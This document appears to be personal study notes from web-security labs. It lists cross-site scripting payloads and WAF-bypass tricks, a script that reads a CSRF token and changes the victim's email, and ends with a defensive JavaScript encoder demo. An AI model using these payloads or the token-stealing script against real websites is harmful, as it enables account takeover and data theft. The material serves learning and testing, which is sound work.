Unique scripts used to bypass specific situations
onmouseover="alert('xss')
"><svg onload="alert('xss')">
<img src=# onerror='alert(1)'>
javascript:alert('xss')
'-alert(document.domain)-'
';alert(document.domain)//
<svg><animatetransform onbegin=alert(1) attributeName=transform>
DOM XSS with Angular expression
{{constructor.constructor('alert(1)')()}}
Arithmetic operator with JS -> causes reflected DOM XSS
\"-alert(1)}//
Stored DOM XSS that bypasses angle-bracket encoding
<><img src=1 onerror=alert(1)>
Script that submits a CSRF-protected form via XSS by first reading the CSRF token
<script>
    var req = new XMLHttpRequest();
    req.onload = handleResponse;
    req.open('get', '/my-account', true);
    req.send();
    function handleResponse() {
        var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
        var changeReq = new XMLHttpRequest();
        changeReq.open('post', '/my-account/change-email', true);
        changeReq.send('csrf=' + token + '&email=test@test.com');
    };
</script>
Tips for causing XSS when blocked by a WAF (web application firewall)
- Brute force to find which tags are available
- Try to execute an attribute on an available tag
- Then force the website to fire the event -> executes the XSS. For example:
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=print()%3E" onload=this.style.width='100px'>
Use your own tag
Info: if the server blocks every known tag you can inject into the code -> create your own, like <xss>
<xss+id=x+onfocus=alert(document.cookie) tabindex=1>#x
Payload that triggers XSS through a keypress event (accesskey) to cause the reflection
%27accesskey=%27x%27onclick=%27alert(1)
Add a backslash (\) to bypass the filter
Info: in some cases the server adds a backslash (\) after you input a quote, so the quote is escaped. To cause reflected XSS, close the script tag with </script> (the backslash does not affect the HTML parser) and then place the payload:
</script><script>alert(1)</script>
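As an added, defender-side example (not from the original notes): the backslash-before-quotes filter described above beside a context-correct JavaScript string encoder, checked against the closing-tag payload. All function names here are my own.

```javascript
// The weak filter the notes describe: it only prefixes quotes with a backslash.
function naiveEscapeQuotes(input) {
  return String(input).replace(/["']/g, (c) => '\\' + c);
}

// Correct encoder for a JavaScript string literal: every character outside
// [A-Za-z0-9] becomes a \uXXXX escape, so '<', '/', quotes and backslashes
// can neither close the surrounding <script> block nor break out of the literal.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) => {
    const hex = c.charCodeAt(0).toString(16).padStart(4, '0');
    return '\\u' + hex;
  });
}

// Builds the inline script a page would emit:  var q = '<user input>';
function renderInlineScript(encoder, input) {
  return "<script>var q = '" + encoder(input) + "';</script>";
}

// Detection check: does the HTML parser's script-closing sequence survive?
// The HTML parser knows nothing about JS backslashes, so "</script" anywhere
// inside the block terminates the script element, whatever the JS quoting.
function closesScriptBlock(html) {
  const body = html.slice('<script>'.length, -'</script>'.length);
  return /<\/script/i.test(body);
}

// Constructed sample: the closing-tag payload discussed in the notes.
const SAMPLE = "</script><script>alert(1)</script>";

// Returns whether each encoder lets the sample break out of the script block.
function demo() {
  return {
    naive: closesScriptBlock(renderInlineScript(naiveEscapeQuotes, SAMPLE)),   // true: breaks out
    encoded: closesScriptBlock(renderInlineScript(encodeForJsString, SAMPLE)), // false: inert
  };
}
```

Run `demo()` to compare the two filters; the quote-only escaper is also insufficient for attribute and URL contexts, where a different encoder is needed.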